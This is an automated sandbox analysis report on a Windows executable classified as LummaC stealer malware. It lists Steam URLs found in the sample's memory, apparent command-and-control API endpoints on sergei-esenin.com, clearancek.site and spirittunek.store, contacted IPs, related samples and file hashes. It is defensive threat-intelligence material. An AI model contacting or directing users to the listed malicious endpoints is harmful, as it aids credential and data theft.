                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngfile.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://avatars.akamai.steamstaticfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://store.steampowered.com/;file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://store.steampowered.com/about/file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://steamcommunity.com/my/wishlist/file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://sergei-esenin.com/apijfile.exe, 00000000.00000002.1579192942.0000000001184000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://help.steampowered.com/en/file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://steamcommunity.com/market/file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://store.steampowered.com/news/file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://community.akamai.steamstatic.com/file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://recaptcha.net/recaptcha/;file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://steamcommunity.com/discussions/file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://store.steampowered.com/stats/file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://medal.tvfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://broadcast.st.dl.eccdnx.comfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://store.steampowered.com/steam_refunds/file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&amp;l=efile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://sergei-esenin.com/api4file.exe, 00000000.00000002.1579192942.000000000116E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://clearancek.site:443/apifile.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://steamcommunity.com/workshop/file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://login.steampowered.com/file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://store.steampowered.com/legal/file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=efile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englfile.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://recaptcha.netfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://upx.sf.netAmcache.hve.5.drfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://store.steampowered.com/file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.giffile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://127.0.0.1:27060file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://spirittunek.store:443/apifile.exe, 00000000.00000002.1579192942.0000000001184000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQAfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=englishfile.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://help.steampowered.com/file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://api.steampowered.com/file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://store.steampowered.com/account/cookiepreferences/file.exe, 00000000.00000003.1330730368.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1330764696.0000000001196000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://store.steampowered.com/mobilefile.exe, 00000000.00000003.1330730368.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1337224103.0000000001201000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown

                                                                                                  World Map of Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public IPs

                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  104.102.49.254
                                                                                                  		steamcommunity.comUnited States
                                                                                                  		16625AKAMAI-ASUStrue
                                                                                                  172.67.206.204
                                                                                                  		sergei-esenin.comUnited States
                                                                                                  		13335CLOUDFLARENETUStrue

                                                                                                  General Information

                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                  Analysis ID:1532851
                                                                                                  Start date and time:2024-10-14 00:59:16 +02:00
                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                  Overall analysis duration:0h 5m 25s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                  Number of analysed new started processes analysed:14
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample name:file.exe
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.evad.winEXE@3/9@10/2
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  HCA Information:Failed
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .exe

                                                                                                  Warnings

                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 20.189.173.21
                                                                                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  • VT rate limit hit for: file.exe

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  TimeTypeDescription
                                                                                                  19:00:20API Interceptor4x Sleep call for process: file.exe modified
                                                                                                  20:47:08API Interceptor2x Sleep call for process: WerFault.exe modified

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                  • www.valvesoftware.com/legal.htm
                                                                                                  172.67.206.204file.exeGet hashmaliciousLummaCBrowse
                                                                                                    SecuriteInfo.com.Win32.Evo-gen.15503.22039.exeGet hashmaliciousLummaCBrowse
                                                                                                      SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exeGet hashmaliciousLummaCBrowse
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse

                                                                                                                      Domains

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      sergei-esenin.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.206.204
                                                                                                                      SecuriteInfo.com.Win32.Evo-gen.15503.22039.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.206.204
                                                                                                                      SecuriteInfo.com.Win32.Evo-gen.11764.10915.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.53.8
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.53.8
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.53.8
                                                                                                                      SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.206.204
                                                                                                                      SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.53.8
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.53.8
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.206.204
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.206.204
                                                                                                                      steamcommunity.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      SecuriteInfo.com.Win32.Evo-gen.15503.22039.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      SecuriteInfo.com.Win32.Evo-gen.11764.10915.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exeGet hashmaliciousVidar, XmrigBrowse
                                                                                                                      • 104.102.49.254

                                                                                                                      ASNs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      CLOUDFLARENETUShttps://60ms64xz.r.eu-west-1.awstrack.me/L0/https:%2F%2Fnym1-ib.adnxs.com%2Fclick2%3Fe=wqT_3QKhAfCBoQAAAAMAxBkFAQj1xf22BhCN5rHDq8rIsXYY6OvVqs3R1c9aIPXtswsoykEwhx04AkDV-qXwAUiY1VJQAFoDVVNEYgNVU0RorAJw-gF4kfdrgAG5zAOIAQGQAQGYAQWgAQKpAVM7_DVZo44_sQHWE0zrJXyFP7kBAAAAwMzM7D_BAREUDMkBUDsJKDDYAQDgAQDwAdEO-AEA%2Fs=555aa6e5683ce51c048a98b83e6a923b5a8d9a2c%2Fbcr=AAAAAAAA8D8=%2Fcnd=%25218hVjbgiv18IdENX6pfABGJjVUiAAKAAxmpmZmZmZuT86CU5ZTTI6NTI1NECoR0kAAAAAAADwP1EAAAAAAAAAAFkAAAAAAAAAAGEAAAAAAAAAAGkAAAAAAAAAAHEAAAAAAAAAAHgAiQEAAAAAAADwPw..%2Fcca=MzcxOSNOWU0yOjUyNTQ=%2Fbn=58937%2Fclickenc=http%253A%252F%252Faa.ns.agingbydesignministry.org%3FMlcinsurance=grant.harpur@mlcinsurance.com.au/1/0102019284444055-c8ec5399-450a-413f-acab-546e07ef32e7-000000/Qxx4uNY6H1RoEfFUkvzFba2SPik=395Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 1.1.1.1
                                                                                                                      http://painel.simpatiafm.com.br/Get hashmaliciousUnknownBrowse
                                                                                                                      • 162.247.243.29
                                                                                                                      SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.20.86.8
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.206.204
                                                                                                                      SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 172.67.35.220
                                                                                                                      SecuriteInfo.com.Trojan.Siggen29.50366.26295.18671.exeGet hashmaliciousXmrigBrowse
                                                                                                                      • 104.20.4.235
                                                                                                                      SecuriteInfo.com.Win32.Evo-gen.15503.22039.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.206.204
                                                                                                                      SecuriteInfo.com.Win32.Evo-gen.11764.10915.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.53.8
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.53.8
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.53.8
                                                                                                                      AKAMAI-ASUSSecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 23.212.89.10
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 2.19.126.150
                                                                                                                      SecuriteInfo.com.Win32.Evo-gen.15503.22039.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      SecuriteInfo.com.Win32.Evo-gen.11764.10915.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254

                                                                                                                      JA3 Fingerprints

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      • 172.67.206.204
                                                                                                                      SecuriteInfo.com.Win32.Evo-gen.15503.22039.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      • 172.67.206.204
                                                                                                                      SecuriteInfo.com.Win32.Evo-gen.11764.10915.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      • 172.67.206.204
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      • 172.67.206.204
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      • 172.67.206.204
                                                                                                                      SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      • 172.67.206.204
                                                                                                                      SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      • 172.67.206.204
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      • 172.67.206.204
                                                                                                                      https://onedoc3.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      • 172.67.206.204
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.102.49.254
                                                                                                                      • 172.67.206.204

                                                                                                                      Dropped Files

                                                                                                                      No context

                                                                                                                      Created / dropped Files

                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_5daac394a3f436a9cd33cf1dfc7575bd2793431_852b229c_b6832536-febd-4f40-8f1e-e18df67f50ac\Report.wer

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):65536
                                                                                                                      Entropy (8bit):1.0351655064963456
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:iMQhV+INDvaPlJ05RLxP3juFuJQzHzuiF/Z24IO8kOB:QZaNq5RL5jEzuiF/Y4IO8v
                                                                                                                      MD5:84629228FB31F5662D9F63D735EEE747
                                                                                                                      SHA1:3820DA24967C73EACF24CCB5A6CCE613740ECB9C
                                                                                                                      SHA-256:8BDA6263FD8D30B1E5E68769CB5319A63B476319F61C925D32403C7CBBD3B0C1
                                                                                                                      SHA-512:ECD396D405F2DB94B5A7485B470483C638FC4BA02921CF27F4322B3426D7EF4CA45D681E82DBBDDD3C03EBEEEEF2B94251C22B3DC5C4C7A0EED74358BA18FB85
                                                                                                                      Malicious:true
                                                                                                                      Reputation:low
